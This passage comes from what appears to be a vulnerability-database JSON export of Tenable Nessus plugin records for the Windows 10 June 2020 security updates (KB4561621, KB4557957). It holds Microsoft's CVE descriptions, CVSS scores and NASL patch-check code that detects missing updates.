to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1274, CVE-2020-1276, CVE-2020-1316)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4561621/windows-10-update-kb4561621\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89a45c0c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561621.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561621'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561621])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T09:41:16", "description": "The remote Windows host is missing security update 4557957.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1120, CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the\n Windows Feedback Hub improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1199)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1282, CVE-2020-1304, CVE-2020-1306,\n CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists in the way that\n the Microsoft Server Message Block 3.1.1 (SMBv3)\n protocol handles certain requests. An authenticated\n attacker who successfully exploited this vulnerability\n against an SMB Server could cause the affected system to\n crash. An unauthenticated attacker could also exploit\n this this vulnerability against an SMB client and cause\n the affected system to crash. (CVE-2020-1284)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)", "edition": 9, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-06-10T00:00:00", "title": "KB4557957: Windows 10 Version 2004 June 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1244", "CVE-2020-1253", "CVE-2020-1203", "CVE-2020-1277", "CVE-2020-1207", "CVE-2020-1275", "CVE-2020-1287", "CVE-2020-1237", "CVE-2020-1272", "CVE-2020-1300", "CVE-2020-1276", "CVE-2020-0916", "CVE-2020-1235", "CVE-2020-1290", "CVE-2020-1220", "CVE-2020-1278", "CVE-2020-1263", "CVE-2020-1251", "CVE-2020-1274", "CVE-2020-1301", "CVE-2020-1254", "CVE-2020-1212", "CVE-2020-1280", "CVE-2020-1211", "CVE-2020-1279", "CVE-2020-1273", "CVE-2020-1213", "CVE-2020-1219", "CVE-2020-1284", "CVE-2020-1120", "CVE-2020-1306", "CVE-2020-1305", "CVE-2020-1160", "CVE-2020-1236", "CVE-2020-1266", "CVE-2020-1311", "CVE-2020-1258", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1307", "CVE-2020-1259", "CVE-2020-1257", "CVE-2020-0986", "CVE-2020-1262", "CVE-2020-1215", "CVE-2020-1209", "CVE-2020-1199", "CVE-2020-1231", "CVE-2020-1281", "CVE-2020-1313", "CVE-2020-1255", "CVE-2020-1232", "CVE-2020-1299", "CVE-2020-1302", "CVE-2020-1296", "CVE-2020-1222", "CVE-2020-1241", "CVE-2020-1216", "CVE-2020-1292", "CVE-2020-1234", "CVE-2020-1247", "CVE-2020-1304", "CVE-2020-1324", "CVE-2020-1312", "CVE-2020-1271", "CVE-2020-1246", "CVE-2020-1261", "CVE-2020-1348", "CVE-2020-1314", "CVE-2020-1282", "CVE-2020-1208", "CVE-2020-1204", "CVE-2020-1239", "CVE-2020-1214", "CVE-2020-1269", "CVE-2020-1233", "CVE-2020-1194", "CVE-2020-0915", "CVE-2020-1268", "CVE-2020-1162", "CVE-2020-1316", "CVE-2020-1294", "CVE-2020-1293", "CVE-2020-1238", "CVE-2020-1286", "CVE-2020-1242", "CVE-2020-1206", "CVE-2020-1264", "CVE-2020-1196", "CVE-2020-1309", "CVE-2020-1315", "CVE-2020-1230", "CVE-2020-1201", "CVE-2020-1270", "CVE-2020-1248", "CVE-2020-1202", "CVE-2020-1291", "CVE-2020-1217", "CVE-2020-1197", "CVE-2020-1283"], "modified": "2020-06-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4557957.NASL", "href": "https://www.tenable.com/plugins/nessus/137304", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137304);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/13\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1120\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1199\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1206\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1209\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1248\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1268\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1273\",\n \"CVE-2020-1274\",\n \"CVE-2020-1275\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1284\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n 